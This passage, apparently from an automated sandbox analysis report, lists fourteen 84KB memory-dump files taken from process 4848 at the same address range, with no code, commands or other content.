                                                                                                                                                                                                                  • memory/4848-171-0x0000000000400000-0x0000000000415000-memory.dmp

                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                    84KB

                                                                                                                                                                                                                  • memory/4848-544-0x0000000000400000-0x0000000000415000-memory.dmp

                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                    84KB

                                                                                                                                                                                                                  • memory/4848-170-0x0000000000400000-0x0000000000415000-memory.dmp

                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                    84KB

                                                                                                                                                                                                                  • memory/4848-56-0x0000000000400000-0x0000000000415000-memory.dmp

                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                    84KB

                                                                                                                                                                                                                  • memory/4848-289-0x0000000000400000-0x0000000000415000-memory.dmp

                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                    84KB

                                                                                                                                                                                                                  • memory/4848-374-0x0000000000400000-0x0000000000415000-memory.dmp

                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                    84KB

                                                                                                                                                                                                                  • memory/4848-459-0x0000000000400000-0x0000000000415000-memory.dmp

                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                    84KB

                                                                                                                                                                                                                  • memory/4848-141-0x0000000000400000-0x0000000000415000-memory.dmp

                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                    84KB

                                                                                                                                                                                                                  • memory/4848-629-0x0000000000400000-0x0000000000415000-memory.dmp

                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                    84KB

                                                                                                                                                                                                                  • memory/4848-714-0x0000000000400000-0x0000000000415000-memory.dmp

                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                    84KB

                                                                                                                                                                                                                  • memory/4848-799-0x0000000000400000-0x0000000000415000-memory.dmp

                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                    84KB

                                                                                                                                                                                                                  • memory/4848-884-0x0000000000400000-0x0000000000415000-memory.dmp

                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                    84KB

                                                                                                                                                                                                                  • memory/4848-969-0x0000000000400000-0x0000000000415000-memory.dmp

                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                    84KB

                                                                                                                                                                                                                  • memory/4848-1054-0x0000000000400000-0x0000000000415000-memory.dmp

                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                    84KB